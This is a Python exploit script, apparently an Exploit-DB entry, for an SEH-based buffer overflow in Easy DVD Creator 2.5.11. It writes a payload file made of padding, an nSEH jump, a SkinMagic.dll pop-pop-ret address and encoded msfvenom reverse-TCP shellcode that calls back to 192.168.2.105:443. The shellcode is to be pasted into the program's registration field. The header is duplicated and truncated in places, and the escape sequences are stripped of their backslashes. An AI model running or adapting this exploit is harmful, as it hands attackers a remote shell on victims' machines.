#!/usr/bin/python

###############################################################################
# Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow (Windows 10 64bit, #!/usr/bin/python

###############################################################################
# Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow (Windows 10 64bit, SEH)
# Date: 26-08-2017
# Exploit Author: tr0ubl3m4k3r
# Vulnerable Software: Easy DVD Creator
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 2.5.11
# Software Link: http://www.divxtodvd.net/easy_dvd_creator.exe
# Tested On: Windows 10 64bit
#
# Credit to Muhann4d for discovering the PoC (41911).
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of exploit.txt
#
##############################################################################


buffer = "x41" * 988
nSEH = "xebx09x90x90"

# 0x10037859 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:Program Files (x86)Easy MOV ConverterSkinMagic.dll)

SEH = "x59x78x03x10"
junk = "x90"*16

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.105 LPORT=443
# -f c -e x86/shikata_ga_nai -b "x00x0ax0d"

shellcode = ("xdbxd5xbfxd7xf8x35x95xd9x74x24xf4x5ax2bxc9xb1"
"x52x83xc2x04x31x7ax13x03xadxebxd7x60xadxe4x9a"
"x8bx4dxf5xfax02xa8xc4x3ax70xb9x77x8bxf2xefx7b"
"x60x56x1bx0fx04x7fx2cxb8xa3x59x03x39x9fx9ax02"
"xb9xe2xcexe4x80x2cx03xe5xc5x51xeexb7x9ex1ex5d"
"x27xaax6bx5exccxe0x7axe6x31xb0x7dxc7xe4xcax27"
"xc7x07x1ex5cx4ex1fx43x59x18x94xb7x15x9bx7cx86"
"xd6x30x41x26x25x48x86x81xd6x3fxfexf1x6bx38xc5"
"x88xb7xcdxddx2bx33x75x39xcdx90xe0xcaxc1x5dx66"
"x94xc5x60xabxafxf2xe9x4ax7fx73xa9x68x5bxdfx69"
"x10xfax85xdcx2dx1cx66x80x8bx57x8bxd5xa1x3axc4"
"x1ax88xc4x14x35x9bxb7x26x9ax37x5fx0bx53x9ex98"
"x6cx4ex66x36x93x71x97x1fx50x25xc7x37x71x46x8c"
"xc7x7ex93x03x97xd0x4cxe4x47x91x3cx8cx8dx1ex62"
"xacxaexf4x0bx47x55x9fxf3x30x57x36x9cx42x57xc9"
"xe7xcaxb1xa3x07x9bx6ax5cxb1x86xe0xfdx3ex1dx8d"
"x3exb4x92x72xf0x3dxdex60x65xcex95xdax20xd1x03"
"x72xaex40xc8x82xb9x78x47xd5xeex4fx9exb3x02xe9"
"x08xa1xdex6fx72x61x05x4cx7dx68xc8xe8x59x7ax14"
"xf0xe5x2exc8xa7xb3x98xaex11x72x72x79xcdxdcx12"
"xfcx3dxdfx64x01x68xa9x88xb0xc5xecxb7x7dx82xf8"
"xc0x63x32x06x1bx20x42x4dx01x01xcbx08xd0x13x96"
"xaax0fx57xafx28xa5x28x54x30xccx2dx10xf6x3dx5c"
"x09x93x41xf3x2axb6")
padding = "x44"*(1000-351)
f = open ("exploit.txt", "w")
f.write(buffer + nSEH + SEH + junk + shellcode + padding)
f.close()